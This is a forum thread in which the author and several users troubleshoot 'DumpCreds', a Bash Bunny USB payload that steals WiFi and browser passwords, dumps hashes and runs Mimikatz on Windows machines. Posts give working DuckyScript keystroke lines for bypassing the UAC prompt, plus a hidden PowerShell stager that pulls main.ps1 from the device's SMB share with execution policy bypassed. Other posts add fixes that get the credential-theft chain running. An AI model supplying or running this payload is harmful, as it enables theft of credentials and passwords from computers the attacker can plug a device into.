qdba Posted April 3, 2017 Author Share Posted April 3, 2017 (edited) New Version 2.0.2 Changelog: Paralellize Powersploit script, so the payload ist faster. Universal Payload. The payload works no matter if there is a UAC prompt or a credentials prompt.. There is no kind of exploitation. You will not get admin rights if you haven't it before. But without admin rights WifiDump, BrowserDump, Computerinformation works fine. Only for Hashdump and M1m1k@tz you ned admin rights. Install: Copy all files to your switch directory. Don't forget the PS Folder. Downlod: See first Post Edited April 3, 2017 by qdba Quote Link to comment Share on other sites More sharing options...
illwill Posted April 3, 2017 Share Posted April 3, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
qdba Posted April 3, 2017 Author Share Posted April 3, 2017 36 minutes ago, illwill said: i havent tested yours but with chromecreds i had an issue with it truncating the urls with... if they were too long. this is how i solved it Get-ChromeCreds | ft UserURL, Password -AutoSize | Out-File $LOOTDIR\Chrome.txt -width 250 Thank you for the information. But it didn't work for me, because I start every process in its own powershell environment with start-job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-) Quote Link to comment Share on other sites More sharing options...
illwill Posted April 3, 2017 Share Posted April 3, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
jafahulo Posted April 3, 2017 Share Posted April 3, 2017 5 minutes ago, illwill said: are your chrome results truncated ? mine are as well Quote Link to comment Share on other sites More sharing options...
Hectortxz Posted April 4, 2017 Share Posted April 4, 2017 I Tried It On Windows 8.1 And Purple Kept Blinking Slow For 5 Minutes. I'm Doing Something Wrong Quote Link to comment Share on other sites More sharing options...
jafahulo Posted April 4, 2017 Share Posted April 4, 2017 Just now, Hectortxz said: I Tried It On Windows 8.1 And Purple Kept Blinking Slow For 5 Minutes. I'm Doing Something Wrong are you in the US? if so, change the keyboard language to US, and the bypass uac letter to "y" 1 Quote Link to comment Share on other sites More sharing options...
Decoy Posted April 4, 2017 Share Posted April 4, 2017 Just now, Hectortxz said: I Tried It On Windows 8.1 And Purple Kept Blinking Slow For 5 Minutes. I'm Doing Something Wrong Is it a slow blink or a fast blink? Is your SMB server kicking off? Does the BB have an IP? Quote Link to comment Share on other sites More sharing options...
Hectortxz Posted April 4, 2017 Share Posted April 4, 2017 47 minutes ago, Decoy said: Is it a slow blink or a fast blink? Is your SMB server kicking off? Does the BB have an IP? Its A Slow Blink. I Think Its My IP I Set It To 172.16.64.1 And 255-255-255-0 But It'll Turn Red When I Try The Payload, But If My Computer Tries To Automatically Get The IP It Blinks A Slow Purple For 5 Minutes Quote Link to comment Share on other sites More sharing options...
Hectortxz Posted April 4, 2017 Share Posted April 4, 2017 52 minutes ago, jafahulo said: are you in the US? if so, change the keyboard language to US, and the bypass uac letter to "y" Change It In The Payload ? Quote Link to comment Share on other sites More sharing options...
qdba Posted April 4, 2017 Author Share Posted April 4, 2017 (edited) 9 hours ago, illwill said: are your chrome results truncated ? In Version 2.0.2 it works. In older versions they are truncated. Edited April 4, 2017 by qdba Quote Link to comment Share on other sites More sharing options...
qdba Posted April 4, 2017 Author Share Posted April 4, 2017 (edited) 3 hours ago, Hectortxz said: Its A Slow Blink. I Think Its My IP I Set It To 172.16.64.1 And 255-255-255-0 But It'll Turn Red When I Try The Payload, But If My Computer Tries To Automatically Get The IP It Blinks A Slow Purple For 5 Minutes If you set the IP manually, The var TARGET_IP will not be set by bunny_helpers.sh script. So the check if there is a target IP fails and it blinks red. I'm working at a extended version for bunny_helpers.sh. Its not an Error of payload. If the LED blinks slow Purple the payload is waiting for smbserver and the handshake. Is a direct connection with explorer to \\172.16.64.1\e working. If yes... does it work when you start the script main.ps1 manually ( enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell. Be sure you have the latest Files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt. Edited April 4, 2017 by qdba Quote Link to comment Share on other sites More sharing options...
Decoy Posted April 4, 2017 Share Posted April 4, 2017 3 hours ago, Hectortxz said: Change It In The Payload ? Yes, you need to change the keyboard layout to US if you after in the US, and change the UAC bypass key to "y". Quote Link to comment Share on other sites More sharing options...
jafahulo Posted April 4, 2017 Share Posted April 4, 2017 11 hours ago, Hectortxz said: Change It In The Payload ? yes it should look something like this: # HID STAGE # Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. LED R G B ATTACKMODE HID Q SET_LANGUAGE US and: # Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o Q DELAY 1000 Q ALT y Q DELAY 500 Q ENTER Quote Link to comment Share on other sites More sharing options...
qdba Posted April 4, 2017 Author Share Posted April 4, 2017 After a Firmware reset this afternoon, I run in trouble with smbserver.py. He didn't start. The Purple LED blinks slow. Affter some tests I realized that afer run of the tools_installer the things was fine installed, but smbserver.py had ^M at the end of every line. I removed it in vi with :1,$s/<CTRL-v><CTRL-M>//g or wth the commands ------------------------------------------------ cd /pentest/impacket/examples cp smbserver.py smbserver.py.sik cat smbserver.py.sik | sed 's/\r$//g' >smbserver.py ----------------------------------------------------------- Now it works again. Quote Link to comment Share on other sites More sharing options...
getJackt Posted April 4, 2017 Share Posted April 4, 2017 What output are you supposed to get with chromecreds? All I see is passwords and the url but they don't seem to be lining up properly Quote Link to comment Share on other sites More sharing options...
Hectortxz Posted April 5, 2017 Share Posted April 5, 2017 20 hours ago, Decoy said: Yes, you need to change the keyboard layout to US if you after in the US, and change the UAC bypass key to "y". I Changed The Payload For The US And I Pinged My IP To 172.16.64.1 And It Came Back Good. It Just Doesn't Pass The Slow Purple Blink. Quote Link to comment Share on other sites More sharing options...
qdba Posted April 5, 2017 Author Share Posted April 5, 2017 1 hour ago, Hectortxz said: I Changed The Payload For The US And I Pinged My IP To 172.16.64.1 And It Came Back Good. It Just Doesn't Pass The Slow Purple Blink. Can you connect to \\172.16.64.1\e from explorer? Is the smbserver.py running ( ssh to Bunny and do a ps -ef |grep smb ) If not see my post above. there is an error in the Impacket installed by tools_installer Quote Link to comment Share on other sites More sharing options...
Altao Posted April 5, 2017 Share Posted April 5, 2017 Hi can you post a working smbserver.py i tried nearly everything a Firmware reset your command the slow purple blink is still the problem i can connect to \\172.16.64.1\e if i run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works if i do ps -ef |grep smb root 693 1 3 16:00 ? 00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2 root 1393 967 0 16:06 pts/0 00:00:00 grep smb and i have a german keyboard what my mistake Greetings Quote Link to comment Share on other sites More sharing options...
qdba Posted April 5, 2017 Author Share Posted April 5, 2017 16 minutes ago, Altao said: Hi can you post a working smbserver.py i tried nearly everything a Firmware reset your command the slow purple blink is still the problem i can connect to \\172.16.64.1\e if i run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works if i do ps -ef |grep smb root 693 1 3 16:00 ? 00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2 root 1393 967 0 16:06 pts/0 00:00:00 grep smb and i have a german keyboard what my mistake Greetings Are you using Version 2.0.2 Is there an UAC Prompt or a Credential prompt? Guess there is a timing Problem. So the main.ps1 script will not start. LED R G # Wait for Bunny Ethernet and Start main.ps1 Powershell Script Q DELAY 500 <<<<<<<<<<<<<<<<<< Increment to 1500 for testing Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" Q DELAY 1000 Q ENTER Does the main.ps1 script fire up right. Can you see the command in Console? Take care that no other Windows is open on the screen. Works best on pure Desktop. Quote Link to comment Share on other sites More sharing options...
Altao Posted April 5, 2017 Share Posted April 5, 2017 Hi i use DumpCreds 2.0.2 Build 1003 I tried your delay still the same problem. i see -.+.! wifi-creds..... and the rest and at last very short a red sript part but too short. Greetings Quote Link to comment Share on other sites More sharing options...
qdba Posted April 5, 2017 Author Share Posted April 5, 2017 7 minutes ago, Altao said: Hi i use DumpCreds 2.0.2 Build 1003 I tried your delay still the same problem. i see -.+.! wifi-creds..... and the rest and at last very short a red sript part but too short. Greetings OK helps a lot. So the handshake Ting works fine. Now the error message would be helpfull. On very fast fanishing error messages I do a trick. I make a video with the smartphone and forward slow manually until the error messages is seen. Quote Link to comment Share on other sites More sharing options...
Altao Posted April 5, 2017 Share Posted April 5, 2017 I got a very good txt file. I try a screening tomorrow okay? Greetings Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted April 6, 2017 Share Posted April 6, 2017 4 hours ago, qdba said: OK helps a lot. So the handshake Ting works fine. Now the error message would be helpfull. On very fast fanishing error messages I do a trick. I make a video with the smartphone and forward slow manually until the error messages is seen. Just modify the script so have verbose or debug option and then have it fire off with debug switch. For part that may have errors I usually wrap it in a try on catch I log it to a local file if debug flag is used. Helps during testing. Better yet, do not run the script hidden. go to cmd, run his stager without the windowstyle option. Or launch powershell and take the code after the -C in his powershell command and run it straight. You should then have the PS session still open to scroll back through the errors. Quote Link to comment Share on other sites More sharing options...
qdba Posted April 9, 2017 Author Share Posted April 9, 2017 DumpCreds_2.1 New Version Changelog Complete new payload.txt code for BashBunny 1.1 Added a lot of debug code into the payload For Debugging create a File "DEBUG" to payload Folder. You got the debug log in \loot\Dumpcreds_2.1 Impacket.deb included for easy impacket installation Some Ducky languages included (from DuckyInstall Payload) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.